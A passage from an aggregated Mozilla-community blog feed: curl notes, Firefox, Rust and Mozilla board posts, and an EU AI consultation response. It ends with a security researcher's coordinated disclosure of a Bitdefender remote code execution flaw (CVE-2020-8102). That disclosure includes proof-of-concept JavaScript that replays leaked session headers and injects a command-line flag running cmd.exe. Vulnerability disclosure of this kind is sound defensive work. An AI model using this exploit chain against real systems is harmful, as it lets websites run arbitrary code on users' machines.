  • treat literal IPv6 addresses with zone IDs as a host name – the curl tool could mistake a given numerical IPv6 address with a “zone id” containing a dash as a “glob” and return an error instead…

Coming up

There are more changes coming and some PR are already pending waiting for the feature window to open. Next release is likely to become version 7.72.0 and have some new features. Stay tuned!

The Firefox FrontierFirefox Relay protects your email address from hackers and spammers

Firefox Relay is a smart, easy solution that can preserve the privacy of your email address, much like a post office box for your physical address. When a form requires … Read more

The post Firefox Relay protects your email address from hackers and spammers appeared first on The Firefox Frontier.

About:CommunityFirefox 78 new contributors

With the release of Firefox 78, we are pleased to welcome the 34 developers who contributed their first code change to Firefox in this release, 28 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Mozilla Future Releases BlogUpdate on Firefox Support for macOS 10.9, 10.10 and 10.11

On June 30th, macOS 10.9, 10.10 and 10.11 users will automatically be moved to the Firefox Extended Support Release (ESR).

While Apple doesn’t have an official policy governing security updates for older macOS releases, their ongoing practice has been to support the most recent three releases (i.e. version N, N-1, and N-2). The last security update applicable to macOS 10.11 was made available nearly 2 years ago in July 2018 (https://support.apple.com/en-us/HT201222). Unsupported operating systems receive no security updates, have known exploits, and can be dangerous to use, which makes it difficult and less than optimal to maintain Firefox for those versions.

Users do not need to take additional action to receive those updates. On June 30th, these macOS users will automatically be moved to the ESR channel through application update.

In the meantime, we strongly encourage our users to upgrade to mac OS X 10.12 or higher to benefit from the security and privacy updates.

For more information please visit the Firefox support page.

The post Update on Firefox Support for macOS 10.9, 10.10 and 10.11 appeared first on Future Releases.

Hacks.Mozilla.OrgWelcoming Safari to the WebExtensions Community

Browser extensions provide a convenient and powerful way for people to take control of how they experience the web. From blocking ads to organizing tabs, extensions let people solve everyday problems and add whimsy to their online lives.

At yesterday’s WWDC event, Apple announced that Safari is adopting a web-based API for browser extensions similar to Firefox’s WebExtensions API. Built using familiar web technologies such as JavaScript, HTML, and CSS, the API makes it easy for developers to write one code base that will work in Firefox, Chrome, Opera, and Edge with minimal browser-specific changes. We’re excited to see expanded support for this common set of browser extension APIs.

What this means for you

Interested in porting your browser extension to Safari? Visit MDN to see which APIs are currently supported. Developers can start testing the new API in Safari 14 using the seed build for macOS Big Sur. The API will be available in Safari 14 on macOS Mojave and macOS Catalina in the future.

Or, maybe you’re new to browser extension development. Check out our guides and tutorials to learn more about the WebExtensions API. Then, visit Firefox Extension Workshop to find information about development tools, security best practices, and tips for creating a great user experience. Be sure to take a look at our guide for how to build a cross-browser extension.

Ready to share your extension with the world (or even just a few friends!)? Our documentation will guide you through the process of making your extension available for Firefox users.

Happy developing!

The post Welcoming Safari to the WebExtensions Community appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl ootw: –connect-timeout

Previous options of the week.

--connect-timeout [seconds] was added in curl 7.7 and has no short option version. The number of seconds for this option can (since 7.32.0) be specified using decimals, like 2.345.

How long to allow something to take?

curl shipped with support for the -m option already from the start. That limits the total time a user allows the entire curl operation to spend.

However, if you’re about to do a large file transfer and you don’t know how fast the network will be so how do you know how long time to allow the operation to take? In a lot of of situations, you then end up basically adding a huge margin. Like:

This operation usually takes 10 minutes, but what if everything is super overloaded at the time, let’s allow it 120 minutes to complete.

Nothing really wrong with that, but sometimes you end up noticing that something in the network or the remote server just dropped the packets and the connection wouldn’t even complete the TCP handshake within the given time allowance.

If you want your shell script to loop and try again on errors, spending 120 minutes for every lap makes it a very slow operation. Maybe there’s a better way?

Introducing the connect timeout

To help combat this problem, the --connect-timeout is a way to “stage” the timeout. This option sets the maximum time curl is allowed to spend on setting up the connection. That involves resolving the host name, connecting TCP and doing the TLS handshake. If curl hasn’t reached its “established connection” state before the connect timeout limit has been reached, the transfer will be aborted and an error is returned.

This way, you can for example allow the connect procedure to take no more than 21 seconds, but then allow the rest of the transfer to go on for a total of 120 minutes if the transfer just happens to be terribly slow.

Like this:

curl --connect-timeout 21 --max-time 7200 https://example.com

Sub-second

You can even set the connection timeout to be less than a second (with the exception of some special builds that aren’t very common) with the use of decimals.

Require the connection to be established within 650 milliseconds:

curl --connect-timeout 0.650 https://example.com

Just note that DNS, TCP and the local network conditions etc at the moment you run this command line may vary greatly, so maybe restricting the connection time a lot will have the effect that it sometimes aborts a connection a little too easily. Just beware.

A connection that stalls

If you prefer a way to detect and abort transfers that stall after a while (but maybe long before the maximum timeout is reached), you might want to look into using –limit-speed.

Also, if a connection goes down to zero bytes/second for a period of time, as in it doesn’t send any data at all, and you still want your connection and transfer to survive that, you might want to make sure that you have your –keepalive-time set correctly.

This Week In RustThis Week in Rust 344

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is diskonaut, a disk usage explorer.

Thanks to Aram Drevekenin for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

325 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-06-23. Lots of improvements this week, and no regressions, which is good. But we regularly see significant performance effects on rollups, which is a concern.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust's beauty lies in the countless decisions made by the development community that constantly make you feel like you can have ten cakes and eat all of them too.

Jake McGinty et al on the tonari blog

Thanks to llogiq for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Cameron KaisermacOS Big Unsure

Finally, Mac OS X goes to 11 with macOS Big Sur. In keeping with Apple's name selection from wildly inappropriate California landmarks, in just three versions you can go from a dusty, hostile desert to an expensive, cramped island and now steep cliffs with rugged beauty as your car goes off a substandard bridge into the Pacific Ocean.

But there's no doubt that Apple's upcoming move to ARM across all its platforms, or at least Apple's version of ARM (let's call it AARM), makes supreme business sense. And ARM being the most common RISC-descended architecture on the planet right now, it's a bittersweet moment for us Power Mac luddites (the other white meat) to see the Reality Distortion Field reject, embrace and then reject x86 once again.

Will AARM benefit Apple? You bet it will. Apple still lives in the shadow of Steve Jobs who always wanted the Mac to be an appliance, and now that Apple controls almost all of the hardware down to the silicon, there's no reason they won't do so. There's certainly benefit to the consumer: Big Sur is going to run really well on AARM because Apple can do whatever hardware tweaks, add whatever special instructions, you name it, to make the one OS the new AARM systems will run as fast and energy-efficient as possible (ironically done with talent from P. A. Semi, who was a Power ISA licensee before Apple bought them out). In fact, it may be the only OS they'll be allowed to run, because you can bet the T2 chip will be doing more and more essential tasks as application-specific hardware adds new functionality where Moore's law has failed. But the biggest win is for Apple themselves, who are no longer hobbled by Intel or IBM's respective roadmaps, and because their hardware will be sui generis will confound any of the attempts at direct (dare I say apples to apples) performance comparisons that doomed them in the past. AARM Macs will be the best machines in their class because nothing else will be in their class.

There's the darker side, too. With things like Gatekeeper, notarization and System Integrity Protection Apple has made it clear they don't want you screwing around with their computers. But the emergence of AARM platforms means Apple doesn't have to keep having the OS itself slap your hand: now the development tools and hardware can do it as well. The possibilities for low-level enforcement of system "security" policies are pretty much limitless if you even control the design of the CPU.

I might actually pick up a low-end one to play with, since I'm sort of a man without a portable platform now that my daily driver is a POWER9 (I have a MacBook Air which I tolerate because battery life, but Mojave Forever, and I'll bet runtime on these machines will be stupendous). However, the part that's the hardest to digest is that the AARM Mac, its hardware philosophy being completely unlike its immediate predecessors, is likely to be more Mac-like than any Mac that came before it save the Compact Macs. After all, remember that Jobs always wanted the Mac to be an appliance. Now, Tim Cook's going to sell you one.

The Mozilla BlogNavrina Singh Joins the Mozilla Foundation Board of Directors

Today, I’m excited to welcome Navrina Singh as a new member of the Mozilla Foundation Board of Directors. You can see comments from Navrina here.

Navrina is the Co-Founder of Credo AI, an AI Fund company focused on auditing and governing Machine Learning. She is the former Director of Product Development for Artificial Intelligence at Microsoft. Throughout her career she has focused on many aspects of business including start up ecosystems, diversity and inclusion, development of frontier technologies and products. This breadth of experience is part of the reason she’ll make a great addition to our board.

In early 2020, we began focusing in earnest on expanding Mozilla Foundation’s board. Our recruiting efforts have been geared towards building a diverse group of people who embody the values and mission that bring Mozilla to life and who have the programmatic expertise to help Mozilla, particularly in artificial intelligence.

Since January, we’ve received over 100 recommendations and self-nominations for possible board members. We ran all of the names we received through a desk review process to come up with a shortlist. After extensive conversations, it is clear that Navrina brings the experience, expertise and approach that we seek for the Mozilla Foundation Board.

Prior to working on AI at Microsoft, Navrina spent 12 years at Qualcomm where she held roles across engineering, strategy and product management. In her last role as the head of Qualcomm’s technology incubator ‘ImpaQt’ she worked with early start-ups in machine intelligence. Navrina is a Young Global Leader with the World Economic Forum; and has previously served on the industry advisory board of the University of Wisconsin-Madison College of Engineering; and the boards of Stella Labs, Alliance for Empowerment and the Technology Council for FIRST Robotics.

Navrina has been named as Business Insiders Top Americans changing the world and her work in Responsible AI has been featured in FORTUNE, Geekwire and other publications. For the past decade she has been thinking critically about the way AI and other emerging technologies impact society. This included a non-profit initiative called Marketplace for Ethical and Responsible AI Tools (MERAT) focused on building, testing and deploying AI responsibly. It was through this last bit of work that Navrina was introduced to our work at Mozilla. This experience will help inform Mozilla’s own work in trustworthy AI.

We also emphasized throughout this search a desire for more global representation. And while Navrina is currently based in the US, she has a depth of experience partnering with and building relationships across important markets – including China, India and Japan. I have no doubt that this experience will be an asset to the board. Navrina believes that technology can open doors, offering huge value to education, economies and communities in both the developed and developing worlds.

Please join me in welcoming Navrina Singh to the Mozilla Foundation Board of Directors.

PS. You can read Navrina’s message about why she’s joining Mozilla here.

Background:

Twitter: @navrina_singh

LinkedIn: https://www.linkedin.com/in/navrina/

The post Navrina Singh Joins the Mozilla Foundation Board of Directors appeared first on The Mozilla Blog.

The Mozilla BlogWhy I’m Joining the Mozilla Board

Firefox was my window into Mozilla 15 years ago, and it’s through this window I saw the power of an open and collaborative community driving lasting change. My admiration and excitement for Mozilla was further bolstered in 2018, when Mozilla made key additions to its Manifesto to be more explicit around it’s mission to guard the open nature of the internet. For me this addendum signalled an actionable commitment to promote equal access to the internet for ALL, irrespective of the demographic characteristic. Growing up in a resource constrained India in the nineties with limited access to global opportunities, this precise mission truly resonated with me.

Technology should always be in service of humanity – an ethos that has guided my life as a technologist, as a citizen and as a first time co-founder of Credo.ai. Over the years, I have seen the deepened connection between my values and Mozilla’s commitment. I had come to Mozilla as a user for the secure, fast and open product, but I stayed because of this alignment of missions. And today, I’m very honored to join Mozilla’s Board.

Growing up in India, having worked globally and lived in the United States for the past two decades, I have first hand witnessed the power of informed communities and transparent technologies to drive innovation and change. It is my belief that true societal transformation happens when we empower our people, give them the right tools and the agency to create. Since its infancy Mozilla has enabled exactly that, by creating an open internet to serve people first, where individuals can shape their own empowered experiences.

Though I am excited about all the areas of Mozilla’s impact, I joined the Mozilla board to strategically support the leaders in Mozilla’s next frontier – supporting it’s theory of change for pursuing more trustworthy Artificial Intelligence.

Mozilla has, from the beginning, rejected the idea of the black box by creating a transparent and open ecosystem making visible all the inner working and decision making within its organizations and products. I am beyond excited to see that this is the same mindset (of transparency and accountability) the Mozilla leaders are bringing to their initiatives in trustworthy Artificial Intelligence (AI).

AI is a defining technology of our times which will have a broad impact on every aspect of our lives. Mozilla is committed to mobilizing public awareness and demand for more responsible AI technology especially in consumer products. In my new role as a Mozilla Foundation Board Member, I am honored to support Mozilla’s AI mission, its partners and allies around the world to build momentum for a responsible and trustworthy digital world.

Today the world crumbles under the weight of multiple pandemics – racism, misinformation, coronavirus – powered and resolved by people and technology. Now more than ever the internet and technology needs to bring equal opportunity, verifiable facts, human dignity, individual expression and collaboration among diverse communities to serve humanity. Mozilla has championed for these tenants and brought about change for decades. Now with it’s frontier focus on trustworthy AI, I am excited to see the continued impact it brings to our world.

We are at a transformational intersection in our lives where we need to critically examine and explore our choices around technology to serve our communities. How can we build technology that is demonstrably worthy of trust? How can we empower people to design systems for transparency and accountability? How can we check the values and biases we are bringing to building this fabric of frontier technology? How can we build diverse communities to catalyze change? How might we build something better, a better world through responsible technology? These questions have shaped my journey. I hope to bring this learning mindset and informed action in service of the Mozilla board and its trustworthy AI mission.

The post Why I’m Joining the Mozilla Board appeared first on The Mozilla Blog.

Daniel Stenbergwebinar: testing curl for security

Alternative title: “testing, Q&A, CI, fuzzing and security in curl”

June 30 2020, at 10:00 AM in Pacific Time (17:00 GMT, 19:00 CEST).

Time: 30-40 minutes

Abstract: curl runs in some ten billion installations in the world, in
virtually every connected device on the planet and ported to more operating systems than most. In this presentation, curl’s lead developer Daniel Stenberg talks about how the curl project takes on testing, QA, CI and fuzzing etc, to make sure curl remains a stable and secure component for everyone while still getting new features and getting developed further. With a Q&A session at the end for your questions!

Register here at attend the live event. The video will be made available afterward.

<figcaption>Daniel presenting at cs3sthlm 2019</figcaption>

Mozilla Open Policy & Advocacy BlogMozilla’s response to EU Commission Public Consultation on AI

In Q4 2020 the EU will propose what’s likely to be the world’s first general AI regulation. While there is still much to be defined, the EU looks set to establish rules and obligations around what it’s proposing to define as ‘high-risk’ AI applications. In advance of that initiative, we’ve filed comments with the European Commission, providing guidance and recommendations on how it should develop the new law. Our filing brings together insights from our work in Open Innovation and Emerging Technologies, as well as the Mozilla Foundation’s work to advance trustworthy AI in Europe.

We are in alignment with the Commission’s objective outlined in its strategy to develop a human-centric approach to AI in the EU. There is promise and the potential for new and cutting edge technologies that we often collectively refer to as “AI” to provide immense benefits and advancements to our societies, for instance through medicine and food production. At the same time, we have seen some harmful uses of AI amplify discrimination and bias, undermine privacy, and violate trust online. Thus the challenge before the EU institutions is to create the space for AI innovation, while remaining cognisant of, and protecting against, the risks.

We have advised that the EC’s approach should be built around four key pillars:

  • Accountability: ensuring the regulatory framework will protect against the harms that may arise from certain applications of AI. That will likely involve developing new regulatory tools (such as the ‘risk-based approach’) as well as enhancing the enforcement of existing relevant rules (such as consumer protection laws).
  • Scrutiny: ensuring that individuals, researchers, and governments are empowered to understand and evaluate AI applications, and AI-enabled decisions – through for instance algorithmic inspection, auditing, and user-facing transparency.
  • Documentation: striving to ensure better awareness of AI deployment (especially in the public sector), and to ensure that applications allow for documentation where necessary – such as human rights impact assessments in the product design phase, or government registries that map public sector AI deployment.
  • Contestability: ensuring that individuals and groups who are negatively impacted by specific AI applications have the ability to contest those impacts and seek redress e.g. through collective action.

The Commission’s consultation focuses heavily on issues related to AI accountability. Our submission therefore provides specific recommendations on how the Commission could better realise the principle of accountability in its upcoming work. Building on the consultation questions, we provide further insight on:

  • Assessment of applicable legislation: In addition to ensuring the enforcement of the GDPR, we underline the need to take account of existing rights and protections afforded by EU law concerning discrimination, such as the Racial Equality directive and the Employment Equality directive.
  • Assessing and mitigating “high risk” applications: We encourage the Commission to further develop (and/or clarify) its risk mitigation strategy, in particular how, by whom, and when risk is being assessed. There are a range of points we have highlighted here, from the importance of context and use being critical components of risk assessment, to the need for comprehensive safeguards, the importance of diversity in the risk assessment process, and that “risk” should not be the only tool in the mitigation toolbox (e.g. consider moratoriums).
  • Use of biometric data: the collection and use of biometric data comes with significant privacy risks and should be carefully considered where possible in an open, consultative, and evidence-based process. Any AI applications harnessing biometric data should conform to existing legal standards governing the collection and processing of biometric data in the GDPR. Besides questions of enforcement and risk-mitigation, we also encourage the Commission to explore edge-cases around biometric data that are likely to come to prominence in the AI sphere, such as voice recognition.

A special thanks goes to the Mozilla Fellows 2020 cohort, who contributed to the development of our submission, in particular Frederike Kaltheuner, Fieke Jansen, Harriet Kingaby, Karolina Iwanska, Daniel Leufer, Richard Whitt, Petra Molnar, and Julia Reinhardt.

This public consultation is one of the first steps in the Commission’s lawmaking process. Consultations in various forms will continue through the end of the year when the draft legislation is planned to be proposed. We’ll continue to build out our thinking on these recommendations, and look forward to collaborating further with the EU institutions and key partners to develop a strong framework for the development of a trusted AI ecosystem. You can find our full submission here.

The post Mozilla’s response to EU Commission Public Consultation on AI appeared first on Open Policy & Advocacy.

Wladimir PalantExploiting Bitdefender Antivirus: RCE from any website

My tour through vulnerabilities in antivirus applications continues with Bitdefender. One thing shouldn’t go unmentioned: security-wise Bitdefender Antivirus is one of the best antivirus products I’ve seen so far, at least in the areas that I looked at. The browser extensions minimize attack surface, the crypto is sane and the Safepay web browser is only suggested for online banking where its use really makes sense. Also very unusual: despite jQuery being used occasionally, the developers are aware of Cross-Site Scripting vulnerabilities and I only found one non-exploitable issue. And did I mention that reporting a vulnerability to them was a straightforward process, with immediate feedback and without any terms to be signed up front? So clearly security isn’t an afterthought which is sadly different for way too many competing products.

Bitdefender's online protection and Safepay components exploding when brought together<figcaption> Image credits: Bitdefender, ImageFreak, matheod, Public Domain Vectors </figcaption>

But they aren’t perfect of course, or I wouldn’t be writing this post. I found a combination of seemingly small weaknesses, each of them already familiar from other antivirus products. When used together, the effect was devastating: any website could execute arbitrary code on user’s system, with the privileges of the current user (CVE-2020-8102). Without any user interaction whatsoever. From any browser, regardless of what browser extensions were installed.

Summary of the findings

As part of its Online Protection functionality, Bitdefender Antivirus will inspect secure HTTPS connections. Rather than leaving error handling to the browser, Bitdefender for some reason prefers to display their own error pages. This is similar to how Kaspersky used to do it but without most of the adverse effects. The consequence is nevertheless that websites can read out some security tokens from these error pages.

These security tokens cannot be used to override errors on other websites, but they can be used to start a session with the Chromium-based Safepay browser. This API was never meant to accept untrusted data, so it is affected by the same vulnerability that we’ve seen in Avast Secure Browser before: command line flags can be injected, which in the worst case results in arbitrary applications starting up.

How Bitdefender deals with HTTPS connections

It seems that these days every antivirus product is expected to come with three features as part of their “online protection” component: Safe Browsing (blocking of malicious websites), Safe Search (flagging of malicious search results) and Safe Banking (delegating online banking websites to a separate browser). Ignoring the question of whether these features are actually helpful, they present antivirus vendors with a challenge: how does one get into encrypted HTTPS connections to implement these?

Some vendors went with the “ask nicely” approach: they ask users to install their browser extension which can then implement the necessary functionality. Think McAfee for example. Others took the “brutal” approach: they got between the browser and the web servers, decrypted the data on their end and re-encrypted it again for the browser using their own signing certificate. Think Kaspersky. And yet others took the “cooperative” approach: they work with the browsers, using an API that allows external applications to see the data without decrypting it themselves. Browsers introduced this API specifically because antivirus products would make such a mess otherwise.

Bitdefender is one of the vendors who chose “cooperative,” for most parts at least. Occasionally their product will have to modify the server response, for example on search pages where they inject the script implementing the Safe Search functionality. Here they unavoidably have to encrypt the modified server response with their own certificate.

Quite surprisingly however, Bitdefender will also handle certificate errors itself instead of leaving them to the browser, despite it being unnecessary with this setup.

Bitdefender error page displayed due to unmatching security certificate

Compared to Kaspersky’s, this page does quite a few things right. For example, the highlighted action is “Take me back to safety.” Clicking “I understand the risks” will present an additional warning message which is both informative and largely mitigates clickjacking attacks. But there is also the issue with HSTS being ignored, same as it was with Kaspersky. So altogether this introduces unnecessary risks when the browser is more capable of dealing with errors like this one.

But right now the interesting aspect here is: the URL in the browser’s address bar doesn’t change. So as far as the browser is concerned, this error page originated at the web server and there is no reason why other web pages from the same server shouldn’t be able to access it. Whatever security tokens are contained within it, websites can read them out – an issue we’ve seen in Kaspersky products before.

What accessing an error page can be good for

My proof of concept used a web server that presented a valid certificate on initial request but switched to an invalid certificate after that. This allowed loading a malicious page in the browser, switching to an invalid certificate then and using XMLHttpRequest to download the resulting error page. This being a same-origin request, the browser will not stop you. In that page you would have the code behind the “I understand the risks” link:

var params = encodeURIComponent(window.location);
sid = "" + Math.random();
obj_ajax.open("POST", sid, true);
obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "NDSECK_c8f32fef47aca4f2586bd075f74d2aa4");
obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "NDCA_c8f32fef47aca4f2586bd075f74d2aa4");
obj_ajax.setRequestHeader("BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF", "835f2e23ded6bda7b3476d0db093e2f590efc1e9333f7bb7ad48f0dba1f548d2");
obj_ajax.setRequestHeader("BDWL_D0D57627257747A3B2EE8E4C3B86CBA3", "a99d4961b70a8179664efc718b00c8a8");
obj_ajax.setRequestHeader("BDPID_A381AA0A15254C36A72B115329559BEB", "1234");
obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "cl.proceedanyway");
obj_ajax.send(params);

So in order to communicate with the Bitdefender application, a website sends a request to any address. The request will then be processed by Bitdefender locally if the correct HTTP headers are set. And despite the header names looking randomized, they are actually hardcoded and never change. So what we are interested in are the values.

The most interesting headers are BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478. These contain essentially the same value, an identifier of the current Bitdefender session. Would we be able to ignore errors on other websites using these? No, this doesn’t work because the correct BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF value is required as well. It’s an HMAC-SHA-256 signature of the page address, and the session-specific secret used to generate this signature isn’t exposed.

But remember, there are three online protection components, and the other ones also expose some functionality to the web. As it turns out, all functionality uses the same BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478 values, but Safe Search and Safe Banking don’t implement any additional protection beyond that. Want to have the antivirus check a bunch of search results for you? Probably not very exciting but any website could access that functionality.

Starting and exploiting banking mode

But starting banking mode is more interesting. The following code template from Bitdefender shows how. This template is meant to generate code injected into banking websites, but it doesn’t appear to be used any more (yes, unused code can still cause issues).

var params = encodeURIComponent(window.location);
sid = "" + Math.random();
obj_ajax.open("POST", sid, true);
obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "{%NDSECK%}");
obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "{%NDCA%}");
obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "{%OBKCMD%}");
obj_ajax.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", "{%OBKREFERRER%}");
obj_ajax.send(params);

We’ve seen NDSECK and NDCA values before, it’s the values which can be extracted from Bitdefender’s error page. OBKCMD can be obk.ask or obk.run depending on whether we want to ask the user first or run the Safepay browser immediately (we want the latter of course). OBKREFERRER can be any address and doesn’t seem to matter. But the params value sent with the request is important, it will be the address opened in the Safepay browser.

So now we have a way to open a malicious website in the Safepay browser, and we can potentially compromise all the nicely isolated online banking websites running there. But that’s not the big coup of course. What if we try to open a javascript: address? Well, it crashes, could be exploitable… And what about whitespace in the address? Spaces will be URL-encoded in https: addresses but not in data: addresses. And then we see the same issue as with Avast’s banking mode, whitespace allows injecting command line flags.

That’s it, time for the actual exploit. Here, param1 and param2 are the values extracted from the error page:

var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");

And this is what you get then:

Command line prompt displayed on top of the Safepay browser window

The first line is the output of the whoami command while the remaining output is produced by the echo command – it displays all the additional command line parameters received by the application.

Conclusions

It’s generally preferable that antivirus vendors stay away from encrypted connections as much as possible. Messing with server responses tends to cause issues even when executed carefully, which is why I consider browser extensions the preferable way of implementing online protection. But even with their current approach, Bitdefender should really leave error handling to the browser.

There is also the casual reminder here that even data considered safe should not be trusted unconditionally. That’s particularly the case when constructing command lines, properly escaping parameter values should be the default, so that unintentionally injecting command line flags for example is impossible. And of course: if you don’t use some code, remove it! Less code automatically means fewer potential vulnerabilities.

Timeline

  • 2020-04-15: Reported the vulnerability via the Bitdefender Bug Bounty Program.
  • 2020-04-15: Confirmation from Bitdefender that the report was received.
  • 2020-04-16: Confirmation that the issue could be reproduced, CVE number assigned.
  • 2020-04-23: Notification that the vulnerability is resolved and updates are underway.
  • 2020-05-04: Communication about bug bounty payout (declined by me) and coordinated disclosure.
  • 2020-05-12: Confirmation that fixes have been pushed out. Disclosure delayed due to waiting for technology partners.